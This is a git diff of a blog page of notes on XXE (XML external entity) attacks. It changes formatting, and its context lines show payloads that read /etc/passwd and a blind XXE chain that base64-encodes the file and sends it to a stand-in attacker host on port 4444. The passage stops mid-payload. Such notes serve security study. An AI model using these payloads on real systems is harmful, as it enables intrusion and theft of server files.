--- a/_posts/notes/web/2022-04-25-xxe.md
+++ b/_posts/notes/web/2022-04-25-xxe.md
@@ -4,33 +4,33 @@ title: 'Notes | XXE'
 permalink: /notes/web/xxe/
 ---
 
-# [](#header-4)Normal
+# Normal
 XXE is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data.
 
 We can make a XML file like:
-{% highlight plain %}
+{% highlight xml %}
 <?xml  version="1.0" encoding="utf-8"?>
 <!DOCTYPE replace [<!ENTITY xxe SYSTEM  "file:///etc/passwd" >]>
 <author>&xxe;</author>
 {% endhighlight %}
 ##### We can use many **wrappers** instead of *file:*. 
 
-# [](#header-4)Blind
+# Blind
 If we don't have any output from the page we can make this:
 
 - First create a XML file in our machine, which will execute the code.
-{% highlight plain %}
+{% highlight xml %}
 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" >
 <!ENTITY % poc "<!ENTITY &#37; xxe SYSTEM 'http://yourip:4444/value=?%file;'>" >
 {% endhighlight %}
 
 - Start a http.server
-{% highlight plain %}
+{% highlight bash %}
 > python3 -m http.server 4444
 {% endhighlight %}
 
 - Upload a similar file to the victim:
-{% highlight plain %}
+{% highlight xml %}
 <?xml  version="1.0" encoding="utf-8"?>
 <!DOCTYPE XXE [
 	<!ENTITY % remote SYSTEM "http://attackerIp:4444/data.xml" >
